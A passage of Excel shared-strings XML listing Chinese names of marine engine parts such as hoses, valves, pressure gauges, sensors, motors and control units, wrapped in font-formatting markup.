        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个管子的钢软管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个接头的钢软管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个接头的钢软管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个连轴节的软管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个连轴节的软管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰的直管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰的弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带接头的弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非钢弯管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带接头的非钢弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的橡胶弯头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹小孔的漏斗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹插孔的漏斗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带管件的漏斗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的漏斗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可挥发有机成分小管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带公制螺纹的接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交叉螺纹连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速接头保护帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形补偿器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离器芯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管式热交换器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板式热交换器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>30</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度弯管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度锥阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两位三通气动阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通气动阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通手动阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>熔断阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水排泄阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填充和测试阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通考克</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰连接球阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接连接球阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支管球阀安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带执行器增压泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆空气缸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油芯注油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力变换器活塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表刻度</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表详细资料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计和温度传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带护套的温度计</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量调节器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油供应单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴润滑单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函供油单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水平仪</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带齿轮的交流电马达</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的交流电马达</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带底座的交流电马达</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变压器和整流器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电压力表</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>场频</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>THOMPSON</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>同步传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动监控</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动报警</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子流量仪</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子接近仪</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>探头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>ALPHA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公用单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器控制单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电脑硬件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可熔插头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重载接头</t>
    </r>
  </si>
  <si>
    <r>
      <t>PCB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插头</t>
    </r>
  </si>
  <si>
    <r>
      <t>PCB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插头套件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
